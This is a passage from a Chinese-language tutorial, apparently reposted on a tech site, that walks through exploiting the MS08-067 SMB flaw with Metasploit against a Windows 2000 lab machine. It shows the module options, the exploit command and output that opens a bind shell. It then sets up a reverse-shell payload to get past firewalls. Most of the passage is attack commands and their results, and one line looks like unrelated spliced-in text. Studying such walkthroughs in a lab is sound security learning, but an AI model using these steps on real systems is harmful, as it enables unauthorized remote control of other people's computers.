Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC thread yes Exit technique: seh, thread, process,none
LPORT 4444 yes The listen port
RHOST 192.168.200.140 no The target address
Exploit target:
Id Name
— —-
0 Automatic Targeting
现在开始溢出攻击
msf exploit(ms08_067_netapi) > exploit
• Started bind handler
• Automatically detecting the target…
• Fingerprint: Windows 2000 – Service Pack 0 – 4 –lang:English
• Selected Target: Windows 2000 Universal
• Attempting to trigger the vulnerability…
• Command shell session 2 opened (192.168.200.148:34431 ->192.168.200.140:4444) at 2011-12-27 01:14:59 -0500
Microsoft Windows 2000 [Version 5.00.2195]
C:WINNTsystem32>
成功获得shell!哈哈!!!
###########################使用ReverseShell方式#####################
大家知道如果攻击者与被攻击之间有防火墙的话,防火墙会检测TCP连接状态,正向连接可能不会成功。wuauclt1exe能删除吗防火墙不能阻止我们攻击的脚步,因为我们还有反向连接
这次我们使用Reverse shell,
msf exploit(ms08_067_netapi) > set payloadwindows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > set LHOST 192.168.200.148
LHOST => 192.168.200.148
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
—- ————— ——– ———–
RHOST 192.168.200.140 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell_reverse_tcp):
Name Current Setting Required Description
本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/jisuanjixue/article-28348-4.html
别再浪费国家资源
永远支持你